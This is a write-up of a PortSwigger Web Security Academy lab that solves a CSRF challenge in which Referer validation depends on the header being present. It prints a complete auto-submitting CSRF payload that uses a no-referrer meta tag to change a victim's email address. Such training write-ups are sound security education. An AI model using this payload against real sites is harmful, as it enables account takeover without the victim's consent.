LAB 11 - CSRF where Referer validation depends on header being present¶

Initial instructions¶

This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.¶

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.¶

You can log in to your own account using the following credentials: wiener:peter¶

First of all lets login with wiener credentials and lets try update its email and intercept this request with Burpsuite.

alt text

Now I will generate a CSRF PoC from this intercepted request and send it to the victim.

alt text

Now I will go to the exploit server and send it to the victim. To make it work we need to add this tag.

<meta name="referrer" content="no-referrer">

We can add it at the top of the CSRF PoC, so the full payload would be:

<html>
<meta name="referrer" content="no-referrer">
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a7a00630487b4608027b2fd00a300cb.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacked@hacked.xyz" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

With this header we supress the Referer header.

alt text

LAB 11 - CSRF where Referer validation depends on header being present¶

Initial instructions¶

This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.¶

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.¶

You can log in to your own account using the following credentials: wiener:peter¶

Congratulations, you solved the lab!¶